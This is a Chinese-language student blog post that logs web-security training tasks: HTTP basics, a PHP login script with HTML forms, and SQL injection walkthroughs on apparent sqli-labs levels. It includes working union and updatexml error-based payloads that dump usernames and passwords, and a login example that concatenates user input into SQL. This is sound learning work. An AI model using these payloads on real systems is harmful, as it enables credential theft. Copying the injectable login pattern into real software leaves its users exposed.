<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="John Doe">







<title>web方向任务 | Hexo</title>



    <link rel="icon" href="/favicon.ico">



<style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&family=Roboto+Mono&display=swap');
</style>



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    




    <!-- scripts list from _config.yml -->
    
    <script src="/js/menu.js"></script>
    










  <meta name="generator" content="Hexo 8.0.0"></head>
  <body>
    <div class="mask-border">
    </div>

    <div class="wrapper">

      <div class="header">
  <div class="flex-container">
    <div class="header-inner">
      <div class="site-brand-container">
        <a href="/">
          
            May&#39;s world
          
        </a>
      </div>
      <div id="menu-btn" class="menu-btn" onclick="toggleMenu()">
        Menu
      </div>
      <nav class="site-nav">
        <ul class="menu-list">
          
            
              <li class="menu-item">
                <a href="/">Home</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/archives/">Archive</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/categories/gallery/">Gallery</a>
              </li> 
                   
          
          
        </ul>
      </nav>
    </div>
  </div>
</div>
<script src="/js/menu.js"></script>


      <div class="main">
        <div class="flex-container">
          <article id="post">

  
    <div class="post-head">
    <div class="post-info">
        <div class="tag-list">
            
        </div>
        <div class="post-title">
            
            
                web方向任务
            
            
        </div>
        <span class="post-date">
            10月 27, 2025
        </span>
    </div>
    <div class="post-img">
        
            <div class="h-line-primary"></div>
              
    </div>
</div>
    <div class="post-content">
    <p>目录索引：</p>
<!-- toc -->

<ul>
<li><a href="#%E4%BB%BB%E5%8A%A1%E4%B8%80">任务一</a><ul>
<li><a href="#http%E7%9A%84%E8%AF%B7%E6%B1%82%E6%96%B9%E5%BC%8F">·HTTP的请求方式</a></li>
<li><a href="#%E5%93%8D%E5%BA%94%E7%A0%81">·响应码</a></li>
<li><a href="#http-%E8%AF%B7%E6%B1%82%E7%A4%BA%E4%BE%8B">·HTTP 请求示例</a></li>
</ul>
</li>
<li><a href="#%E4%BB%BB%E5%8A%A1%E4%BA%8C%E8%AF%AD%E8%A8%80%E5%9F%BA%E7%A1%80">任务二——语言基础</a><ul>
<li><a href="#php">·php</a></li>
<li><a href="#html">·html</a></li>
</ul>
</li>
<li><a href="#%E4%BB%BB%E5%8A%A1%E4%B8%89sql%E6%B3%A8%E5%85%A5">任务三——sql注入</a><ul>
<li><a href="#less-1">less-1</a></li>
<li><a href="#less-5">Less-5</a></li>
<li><a href="#less-11">less-11</a></li>
</ul>
</li>
</ul>
<!-- tocstop -->

<h1><span id="任务一">任务一</span></h1><h2><span id="http的请求方式">·HTTP的请求方式</span></h2><table>
<thead>
<tr>
<th>方法</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>GET</td>
<td>从服务器<strong>获取</strong>资源。</td>
</tr>
<tr>
<td>POST</td>
<td>向服务器发送数据以<strong>创建</strong>新资源。发送的数据包含在<u>请求体</u>中。</td>
</tr>
<tr>
<td>PUT</td>
<td>向服务器发送数据以<strong>更新</strong>现有资源。</td>
</tr>
<tr>
<td>DELETE</td>
<td>从服务器<strong>删除</strong>指定的资源。</td>
</tr>
<tr>
<td>PATCH</td>
<td>对资源进行部分<strong>修改</strong>。 （只更改部分数据）</td>
</tr>
<tr>
<td>HEAD</td>
<td>类似于 GET，但服务器<u>只返回响应的头部</u>，不返回实际数据。</td>
</tr>
</tbody></table>
<h2><span id="响应码">·响应码</span></h2><div class="marginalia-layout">

<article class="main-content-1">
<div style="background: #3c3c3dff; border-left: 4px solid #ededeeff; padding: 12px 16px; border-radius: 4px; margin: 16px 0;">

<p><strong>200（ok）</strong><br>请求成功。一般用于get和post请求</p>
<p><strong>301（moved permanently）</strong><br>永久移动。资源移动到了新的URI，返回信息会包含新的URI，浏览器会自动定向新的。日后请求由新的代替</p>
<p><strong>302（Found）</strong><br>临时移动资源被临时移动，客户端使用原有的URI</p>
<p><strong>404（Not Found）</strong><br>服务器无法根据客户端请求响应界面</p>
<p><strong>500</strong><br>服务器内部错误</p>
</div>
</article>

<aside class="marginalia">
    <div class="marginal-note" data-target="1">
        <div class="note-content">1xx：（信息）收到了</div>
    </div>
    <div class="marginal-note" data-target="2">
        <div class="note-content">2xx：（成功）接收并处理中</div>
    </div>
    <div class="marginal-note" data-target="3">
        <div class="note-content">3xx：（重定向）需进一步操作</div>
    </div>
    <div class="marginal-note" data-target="4">
        <div class="note-content">4xx:（客户端错误）请求有语法错误或无法完成请求</div>
    </div>
    <div class="marginal-note" data-target="5">
        <div class="note-content">5xx：（服务器错误）服务器在处理过程中有误</div>
    </div>
</aside>

</div>
<!-- 这里正确关闭了第一个批注布局 -->

<h2><span id="http-请求示例">·HTTP 请求示例</span></h2><div style="background: #3c3c3dff; border-left: 4px solid #ededeeff; padding: 12px 16px; border-radius: 4px; margin: 16px 0;">

<p>POST &#x2F;api&#x2F;graphs&#x2F;fulltext-search?haha&#x3D;123 HTTP&#x2F;1.1<br>Host: localhost<br>Cookie: xxx&#x3D;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<br>User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML,like Gecko) Chrome&#x2F;140.0.0.0 Safari&#x2F;537.36 Edg&#x2F;140.0.0.0<br>Sec-Ch-Ua: “Chromium”;v&#x3D;”140”, “Not&#x3D;A?Brand”;v&#x3D;”24”, “Microsoft Edge”;v&#x3D;”140”Sec-Ch-Ua-Mobile: ?0<br>Accept: text&#x2F;html<br>Referer: <a target="_blank" rel="noopener" href="https://osgraph.com/">https://osgraph.com/</a><br>Accept-Encoding: gzip, deflate, br<br>Accept-Language: zh-CN,zh;q&#x3D;0.9,en;q&#x3D;0.8,en-GB;q&#x3D;0.7,en-US;q&#x3D;0.6<br>Connection: close<br>Content-Type: application&#x2F;x-www-form-urlencoded<br>Content-Length: 26<br>indexName&#x3D;github&amp;keyword&#x3D;1</p>
</div>

<p>【解析】</p>
<p>提交给 /api/graphs/fulltext-search 参数是haha=123 用的HTTP/1.1协议（可能我学的还浅，觉得这里不应该有参数咳咳）</p>
<p>请求目标主机：localhost即服务器运行在自己主机上（所以这是自己搭建的靶机环境吗？）</p>
<p>会话令牌：xxx=xxxxxxxxxxxxxxxxxxxxxxxxxxx</p>
<p>客户端标识：mozilla/5.0兼容模式 用的Windows10 64位 edg浏览器</p>
<p>接收：客户端希望返回HTML文件</p>
<p>来源页面：https：//osgraph.com/</p>
<p>接受编码：gzip/deflate/br 压缩</p>
<p>接受语言：中文，英文，德语，美式英语</p>
<p>Tcp连接会在传输后关闭</p>
<p>内容类型：application/x-www-form-urlencoded</p>
<p>说明请求体数据经过url编码</p>
<p>内容长度：26字节</p>
<p>请求体：</p>
<p>索引名：GitHub 密码：1</p>

<hr>
<h1><span id="任务二语言基础">任务二——语言基础</span></h1><p>所有的学习资料来源于<a target="_blank" rel="noopener" href="https://www.runoob.com/">菜鸟教程</a>和ai<br>语言其实互通性还挺大的，感觉互相联想还是比较好理解的，但真正使用起来确实还是有点生疏和力不从心</p>
<h2><span id="php">·php</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// login.php</span><br><span class="line">// 纯 PHP 登录示例，使用单独文件的数据库连接</span><br><span class="line">// 引入数据库连接</span><br><span class="line">require <span class="string">&#x27;db.php&#x27;</span>;</span><br><span class="line">// 模拟接收表单数据（CLI 或 Web POST）</span><br><span class="line"><span class="keyword">if</span> (php_sapi_name() === <span class="string">&#x27;cli&#x27;</span>) &#123;</span><br><span class="line"> <span class="built_in">echo</span> <span class="string">&quot;请输入用户名: &quot;</span>;</span><br><span class="line"> <span class="variable">$username</span> = trim(fgets(STDIN));</span><br><span class="line">web任务.md 2025-09-22</span><br><span class="line">2 / 3</span><br><span class="line"> <span class="built_in">echo</span> <span class="string">&quot;请输入密码: &quot;</span>;</span><br><span class="line"> <span class="variable">$password</span> = trim(fgets(STDIN));</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"> <span class="variable">$username</span> = trim(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>);</span><br><span class="line"> <span class="variable">$password</span> = trim(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>] ?? <span class="string">&#x27;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line">// 检查输入</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$username</span> === <span class="string">&quot;&quot;</span> || <span class="variable">$password</span> === <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line"> <span class="built_in">echo</span> <span class="string">&quot;用户名和密码不能为空\n&quot;</span>;</span><br><span class="line"> <span class="built_in">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line">// 查询数据库（明文密码示例）</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM users WHERE username=&#x27;<span class="variable">$username</span>&#x27; AND password=&#x27;<span class="variable">$password</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$conn</span>-&gt;query(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$result</span> &amp;&amp; <span class="variable">$result</span>-&gt;num_rows &gt; 0) &#123;</span><br><span class="line"> <span class="built_in">echo</span> <span class="string">&quot;登录成功！欢迎你，<span class="variable">$username</span>\n&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"> <span class="built_in">echo</span> <span class="string">&quot;用户名或密码错误\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">// 关闭数据库</span><br><span class="line"><span class="variable">$conn</span>-&gt;close();</span><br></pre></td></tr></table></figure>
<p>STCIN指键盘输入<br>fgets()：读取一行字<br>Trim：去\n，Tab，空格</p>
<p>$_POST：<br>用于接受表单内的数据<br>  		 网页上让用户输入信息的区域<br>?? ’ ’：表示字段不存在</p>
<p>数据库连接对象$conn调用Query()方法，运行sql语句，然后将结果返给result变量</p>
<p>Num_rows查询语句返回的记录行数</p>
<h2><span id="html">·html</span></h2><p>其实在对于博客的文章的渲染就用了html和css。天，觉得有的麻烦了，但视觉效果确实又会舒适很多，感觉在使用网页版荧光笔便利贴标签，但很明显其作用又不止如此。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- login.html --&gt;</span><br><span class="line">&lt;!doctype html&gt;</span><br><span class="line">web任务.md 2025-09-22</span><br><span class="line">3 / 3</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;<span class="built_in">head</span>&gt;&lt;meta charset=<span class="string">&quot;utf-8&quot;</span>&gt;&lt;title&gt;Login&lt;/title&gt;&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"> &lt;h3&gt;登录&lt;/h3&gt;</span><br><span class="line"> &lt;form action=<span class="string">&quot;/login.php&quot;</span> method=<span class="string">&quot;post&quot;</span>&gt;</span><br><span class="line"> &lt;label&gt;用户名: &lt;input <span class="built_in">type</span>=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;username&quot;</span> /&gt;&lt;/label&gt;&lt;br&gt;</span><br><span class="line"> &lt;label&gt;密码: &lt;input <span class="built_in">type</span>=<span class="string">&quot;password&quot;</span> name=<span class="string">&quot;password&quot;</span> /&gt;&lt;/label&gt;&lt;br&gt;</span><br><span class="line"> &lt;button <span class="built_in">type</span>=<span class="string">&quot;submit&quot;</span>&gt;登录&lt;/button&gt;</span><br><span class="line"> &lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line">&lt;!-- upload.html --&gt;</span><br><span class="line">&lt;!doctype html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"> &lt;h3&gt;上传文件&lt;/h3&gt;</span><br><span class="line"> &lt;form action=<span class="string">&quot;/upload.php&quot;</span> method=<span class="string">&quot;post&quot;</span> enctype=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span><br><span class="line"> &lt;input <span class="built_in">type</span>=<span class="string">&quot;file&quot;</span> name=<span class="string">&quot;file&quot;</span> /&gt;</span><br><span class="line"> &lt;button <span class="built_in">type</span>=<span class="string">&quot;submit&quot;</span>&gt;上传&lt;/button&gt;</span><br><span class="line"> &lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>登录界面<br>有一个h3号标题 登录<br>两个输入框：<br>用户名&#x2F;密码</p>
<p>用php后端实现的文件上传</p>
<hr>
<h1><span id="任务三sql注入">任务三——sql注入</span></h1><p>非常抱歉有那个懒病和拖延症，所以只完成最低要求的几个注入啦。（当然后续也许会继续“闯关”？</p>
<h2><span id="less-1">less-1</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=null<span class="string">&#x27; union select 1,2,3--+</span></span><br><span class="line"><span class="string">?id=null&#x27;</span> union <span class="keyword">select</span> 1,2,,4--+</span><br></pre></td></tr></table></figure>
<p>发现只有三栏<br><img src="https://sleepdayandnight.github.io/image/less-1-1.png" alt="less-1"></p>
<p>获取所有数据库名<br>?id&#x3D;null’ union select 1,database(),3–+<br><img src="https://sleepdayandnight.github.io/image/less-1-2.png" alt="less-1"></p>
<p>获取所有表名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=-1<span class="string">&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/less-1-3.png" alt="less-1"></p>
<p>获取所有栏名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=-1<span class="string">&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema= &#x27;</span>security<span class="string">&#x27; and table_name=&#x27;</span><span class="built_in">users</span><span class="string">&#x27;--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/less-1-4.png" alt="less-1"></p>
<p>破解</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=-1<span class="string">&#x27; union select 1,2,group_concat(id,username,password) from users--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/less-1-5.png" alt="less-1"></p>
<h2><span id="less-5">Less-5</span></h2><div style="background: #3c3c3dff; border-left: 4px solid #ededeeff; padding: 12px 16px; border-radius: 4px; margin: 16px 0;">

<p>由于无论输入何值，都没有正常的数据回显点，</p>
<p>“这个网站的程序，直接将我的用户输入（id参数），未经过任何有效的过滤或安全处理，就拼接到了SQL语句中执行了。”</p>
<p>数据库首先会执行我们嵌入在参数2中的子查询（如 (SELECT database())）。<br>拼接结果：将子查询的结果与参数2的其他部分拼接，形成一个完整的参数。<br>执行函数：数据库尝试执行该函数。<br>触发错误：由于拼接后的参数2是一个非法值，函数执行失败。<br>输出信息：在错误信息中，数据库会告诉我们“在处理 [拼接后的参数2] 时出错了”，从而泄露了数据。<br>XML是一种结构化的标记语言，用来存储和传输数据。</p>
<p>Updatexml<br>UPDATEXML(XML_document, XPath_string, new_value)<br>由于子查询只能返回单行单列，所以要多次查询</p>
</div>


<p>输入任意数值，都没有正常的数据回显点<br>当我们输入 ?id&#x3D;1’</p>
<p>首先说明这是个字符型注入 （后续用id&#x3D;1’–+可以确认）<br>说明这个网站的程序，直接将我的用户输入（id参数），未经过任何有效的过滤或安全处理，就拼接到了SQL语句中执行了。<br>于是考虑报错注入</p>
<p>于是考虑输入我们的payload<br><img src="https://sleepdayandnight.github.io/image/less-5-0.png" alt="less-5"></p>
<p>Id&#x3D;1’</p>
<p>对于漏洞注入的步骤<br>探测注入点<br>确认注入类型<br>直接payload攻击<br>数据库名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=1<span class="string">&#x27; and updatexml(1, concat(&#x27;</span>~<span class="string">&#x27;, database(), &#x27;</span>~<span class="string">&#x27;), 3)--+</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=1<span class="string">&#x27; and updatexml(1, concat(&#x27;</span>~<span class="string">&#x27;, (select table_name from information_schema.tables where table_schema=&#x27;</span>security<span class="string">&#x27; limit 0,1), &#x27;</span>~<span class="string">&#x27;), 3)--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/less-5-1.png" alt="less-5"><br><img src="https://sleepdayandnight.github.io/image/less-5-2.png" alt="less-5"><br><img src="https://sleepdayandnight.github.io/image/less-5-3.png" alt="less-5"><br><img src="https://sleepdayandnight.github.io/image/less-5-4.png" alt="less-5"></p>
<p>依次返回emils referers uagents users<br>很明显我们需要的是users</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=1<span class="string">&#x27; and updatexml(1, concat(&#x27;</span>~<span class="string">&#x27;, (select column_name from information_schema.columns where table_name=&#x27;</span><span class="built_in">users</span><span class="string">&#x27; limit 0,1), &#x27;</span>~<span class="string">&#x27;), 3)--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/less-5-6.png" alt="less-5"><br><img src="https://sleepdayandnight.github.io/image/less-5-7.png" alt="less-5"><br><img src="https://sleepdayandnight.github.io/image/less-5-8.png" alt="less-5"><br>USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=1<span class="string">&#x27; and updatexml(1, concat(&#x27;</span>~<span class="string">&#x27;, (select group_concat(id,username,password)from ‘users’), &#x27;</span>~<span class="string">&#x27;), 3)--+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://sleepdayandnight.github.io/image/WPS%E5%9B%BE%E7%89%87(1).png" alt="less-5"><br>后续同理 不赘述了</p>
<h2><span id="less-11">less-11</span></h2><p>输入1’<br><img src="https://sleepdayandnight.github.io/image/less-11-1.png" alt="less-11"><br>说明存在sql注入 且为字符型<br>对url进行修改 无反应，说明参数是通过post传递，可以考虑用burpsuit，但有输入框，直接注入也可以<br>用1’ union select 1,2#试探了一下 有回显位置<br><img src="https://sleepdayandnight.github.io/image/less-11-2.png" alt="less-11"><br>到1’ union select 1,2,3#<br><img src="https://sleepdayandnight.github.io/image/less11-3.png" alt="less-11"><br>说明只有两列<br>后续和less-1一样<br><img src="https://sleepdayandnight.github.io/image/less-11-4.png" alt="less-11"></p>
<style>
.marginalia-layout {
    display: grid;
    grid-template-columns: 1fr 200px;
    gap: 40px;
    max-width: 1200px;
    margin: 20px auto;
}

.main-content-1, .main-article {
    position: relative;
}

.marginalia {
    position: sticky;
    top: 20px;
    border-left: 3px solid #e9ecef;
    padding-left: 20px;
    align-self: start;
    max-height: calc(100vh - 40px);
    overflow-y: auto;
}

.marginal-note {
    position: relative;
    margin-bottom: 15px;
    padding: 12px;
    background: #c2e0fd;
    border-radius: 6px;
    font-size: 0.9em;
    line-height: 1.4;
}

.note-marker {
    position: absolute;
    left: -22px;
    top: 50%;
    transform: translateY(-50%);
    width: 20px;
    height: 20px;
    background: #007cba;
    color: white;
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    font-size: 0.7em;
    font-weight: bold;
}

.note-content {
    color: #495057;
}

/* 确保普通内容不受影响 */
body > *:not(.marginalia-layout) {
    max-width: 800px;
    margin: 0 auto;
    display: block;
}

@media (max-width: 1024px) {
    .marginalia-layout {
        grid-template-columns: 1fr;
    }
    
    .marginalia {
        border-left: none;
        border-top: 3px solid #e9ecef;
        padding-left: 0;
        padding-top: 20px;
        max-height: none;
    }
    
    .note-marker {
        left: 12px;
        top: -8px;
    }
}
</style>
</div> 

<script>
    window.onload = detectors();
</script>
    <div class="post-footer">
    <div class="h-line-primary"></div>
    <nav class="post-nav">
        <div class="prev-item">
           
                <div class="icon arrow-left"></div>
                <div class="post-link">
                    <a href="/2025/11/02/reverse%E6%96%B9%E5%90%91%E4%BB%BB%E5%8A%A1/">Prev</a>
                </div>
            
        </div>
        <div class="next-item">
            
                <div class="icon arrow-right"></div>
                <div class="post-link">
                  <a href="/2025/10/26/%E5%9F%BA%E7%A1%80%E4%BB%BB%E5%8A%A1/">Next</a>  
                </div>  
            
        </div>
    </nav>
</div>

    
      <div class="post-comment">

     

     
    
    

</div>
     
  
</article>
        </div>
      </div>
      
      <div class="footer">
    <div class="flex-container">
        <div class="footer-text">
            
            
            
                Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a target="_blank" rel="noopener" href="https://github.com/zoeingwingkei/frame/">Frame</a>
                
        </div>
    </div>
</div>

    </div>

    
    

  </body>
</html>
